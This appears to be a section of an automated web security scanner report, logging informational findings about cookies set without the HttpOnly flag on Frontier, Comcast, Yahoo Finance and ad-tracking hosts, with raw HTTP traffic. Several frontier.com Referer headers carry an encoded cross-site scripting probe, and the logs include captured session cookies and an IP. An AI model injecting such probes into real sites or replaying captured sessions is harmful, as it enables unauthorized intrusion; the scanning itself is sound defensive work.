User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2966958661410417168

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Sun, 04-Mar-2012 12:50:52 GMT; Path=/
Content-Type: text/javascript
Content-Length: 87
Date: Tue, 06 Sep 2011 12:50:52 GMT

new Image().src="http://d.turn.com/r/dm/mkt/73/mpid//mpuid/2966958661410417168/nu/n";


10.43. http://ehg-verizon.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM50061742AC05EN3&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605079NESV6=V1rrrrr"rz%X%QBe%XBQrBrCBXz%zrzr"%X%QBe%XBQz%X%QBe%XBQ"%X%QBe%XBQ"%X%QBe%XBQrBrCBX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; DM560905OCSMV6=V1rrrrr"rz%X%QBe%CQr%%r^iQz%zrz^C@"%X%QBe%CQrz%X%QBe%CQr"%X%QBeBX^@"%X%QBe%CQr%%r^iQ"@i@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6Q%zA6DTdT:kTHGIWaoF9; DM56050737WDV6=V1rrrrr"rz%X%QBeBQXr@Cre%ez%zrzr"%X%QBeBQXrz%X%QBeBQXr"%X%QBeBQXr"%X%QBeBQXr@Cre%e"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6@%zA6DTdT:kTHGIWaoF9; DM56050762VVV6=V1rrrrr"rz%X%QBeBQCCr^riB^z%zrzr"%X%QBeBQCCz%X%QBeBQCC"%X%QBeBQCC"%X%QBeBQCCr^riB^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6CzA6DTdT:kTHGIWaoF9; DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCrizBz%X@rzr"%X%QBeQX%Xz%X%QBe%Xre"%X%QBeQX%X"%X%QBeQX%XiirCCX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605070DMBV6=V1rrrrr"rz%X%QBeBQ@C^%r@QezBz%X@rzr"%X%QBeQX%Xz%X%QBeBQ@C"%X%QBeQX%X"%X%QBeQX%XiirCCX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%%@zA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@zBz%XQCzXB"%X%QBeQX%Xz%X%QBer^Xe"%X%QBeQXCQ"%X%QBeQX%XiirCCX"XBz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rzBz%X@^zr"%X%QBeQXCQz%X%QBe%%%X"%X%QBeQXCQ"%X%QBeQXCQ^%rQCC"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; CTG=1315265345

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:43 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM50061742ACV6=V1rQ(#X"rz%X%QXr^iCBeXr%XQz%zrz%"%X%QXr^iCBz%X%QXr^iCB"%X%QXr^iCX"%X%QXr^iCBeXr%XQ"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XQzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Wed, 05-Sep-2012 11:50:43 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QXr^iCB; path=/; domain=.hitbox.com; expires=Wed, 05-Sep-2012 11:50:43 GMT; max-age=31536000
Set-Cookie: CTG=1315309843; path=/; domain=.hitbox.com; expires=Tue, 13-Sep-2011 11:50:43 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Tue, 06 Sep 2011 11:50:44 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.44. http://espanol.vonage.com/mpel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://espanol.vonage.com
Path:   /mpel.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mpel.js?href=http://www.vonage.com/&ref=http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service&lang=en-US HTTP/1.1
Host: espanol.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Set-Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; Version=1; Domain=.vonage.com; Max-Age=31536000; Expires=Wed, 05-Sep-2012 11:50:14 GMT; Path=/
Content-Length: 0


10.45. http://external.dmtracker.com/tags/vs.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.dmtracker.com
Path:   /tags/vs.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tags/vs.js HTTP/1.1
Host: external.dmtracker.com
Proxy-Connection: keep-alive
Referer: http://servicetips.whitefence.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 5215
Content-Type: application/x-javascript
Last-Modified: Wed, 27 Jan 2010 20:03:11 GMT
Accept-Ranges: bytes
ETag: "80e95bc08b9fca1:662"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP LAW PSA ADM DEV TAI IVA HIS OUR IND"
X-Powered-By: ASP.NET
Set-Cookie: v1st=585D1ECA0A35F6F3; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.dmtracker.com
Date: Tue, 06 Sep 2011 11:59:35 GMT
Connection: close

//Version: JT02
//V1 of Instrumentation Toolkit Addition
//Staging version with staging sensors

var _JT=new Object();
_JT.protocol=location.protocol;//override "https:"
_JT.v="JT01.02";
_JT.ns
...[SNIP]...

10.46. http://finance.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:44:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: finbeta=fp-bkt_o; expires=Wed, 07-Sep-2011 12:44:52 GMT; path=/; domain=finance.yahoo.com
Location: http://finance.yahoo.com/
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 89

<!-- xsltm25.finance.sp2.yahoo.com uncompressed/chunked Tue Sep 6 05:44:52 PDT 2011 -->

10.47. http://finance.yahoo.com/q  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /q

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F HTTP/1.1
Host: finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; finbeta=fp-bkt_o; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:15 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Set-Cookie: PRF=&t=XSS.F; expires=Fri, 03 Sep 2021 05:48:15 GMT; path=/; domain=finance.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 51214

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>XSS.F: S
...[SNIP]...

10.48. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431 HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331687930%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315331688369%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: VISITORID=2086762009; Domain=.comcast.com; Expires=Sat, 06-Sep-2014 05:51:12 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 119084
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

10.49. http://forums.comcast.com/t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331694799%3B%20gpv_07%3Dcorporate%2520-%2520learn%2520-%2520xfinity%2520-%2520wireless-mobile-broadband%2520%7C1315331694819%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; VISITORID=2086762009; LiSESSIONID=52B4547347B0428CE9D783866B22AFED

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: VISITORID=2086762009; Domain=.comcast.com; Expires=Sat, 06-Sep-2014 05:51:13 GMT; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Tue, 06 Sep 2011 12:24:55 GMT
Expires: Wed, 05 Sep 2012 12:24:55 GMT
Content-Length: 4621
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<....IDATx.LYY.d.Y..sN...........1..I.X.D,B."...    G...\pa$..O.!!q....    ..\p.B .9......x<.........r.o.y...P-MWW..]..y.......C%C.C.D.e.
...[SNIP]...

10.50. http://forums.comcast.com/t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36?v=mpbl-1 HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331694799%3B%20gpv_07%3Dcorporate%2520-%2520learn%2520-%2520xfinity%2520-%2520wireless-mobile-broadband%2520%7C1315331694819%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; VISITORID=2086762009; LiSESSIONID=52B4547347B0428CE9D783866B22AFED

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: LiSESSIONID=52B4547347B0428CE9D783866B22AFED; Path=/; HttpOnly
Set-Cookie: VISITORID=2086762009; Domain=.comcast.com; Expires=Sat, 06-Sep-2014 05:51:13 GMT; Path=/
Set-Cookie: LithiumUserInfo=""; Domain=.comcast.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Fri, 11 Mar 2011 08:18:50 GMT
Expires: Wed, 05 Sep 2012 12:24:55 GMT
Content-Length: 1238
Connection: close
Content-Type: image/jpeg;charset=UTF-8

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......$.).."..............................
...[SNIP]...

10.51. http://frontier.com/AgentOrdering/customAppTabInfo/docobj.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/customAppTabInfo/docobj.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AgentOrdering/customAppTabInfo/docobj.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8823CMWUY; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 669
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:50 GMT

function getDocObj(elem,parent){
if(document.layers)
{
   if(parent){
       return "document."+parent+".document."+elem;
   }
   else{
       return "document."+elem;
   }
}
else if(document.all){
       return
...[SNIP]...

10.52. http://frontier.com/AgentOrdering/customAppTabInfo/tabNavigation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/customAppTabInfo/tabNavigation.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AgentOrdering/customAppTabInfo/tabNavigation.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8823CMWUY; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 4570
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:50 GMT

/* ********************************************************************************
CREATED 05/05 AXG987 per ER Rqst 10855

The file, tabNavigation.js, contains the JavaScript that makes the tab na
...[SNIP]...

10.53. http://frontier.com/AgentOrdering/customAppTabInfo/tabSetup.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/customAppTabInfo/tabSetup.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AgentOrdering/customAppTabInfo/tabSetup.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8823CMWWU; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 2645
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:04 GMT

/* ********************************************************************************
CREATED 06/06 AXG987

*********************************************************************************** */


...[SNIP]...

10.54. http://frontier.com/AgentOrdering/javascripts/AgentOrdering.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/javascripts/AgentOrdering.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AgentOrdering/javascripts/AgentOrdering.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8823CMWUY; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 339
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:50 GMT

function AdvanceCursorByLengthChk(thisForm, presentObj, moveToName, maxLgth)
{
   if (presentObj.value.length == maxLgth)
   {
       setFocusToObj(thisForm, moveToName);
       return;
   }
}

function setF
...[SNIP]...

10.55. http://frontier.com/AgentOrdering/javascripts/validateinteger.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
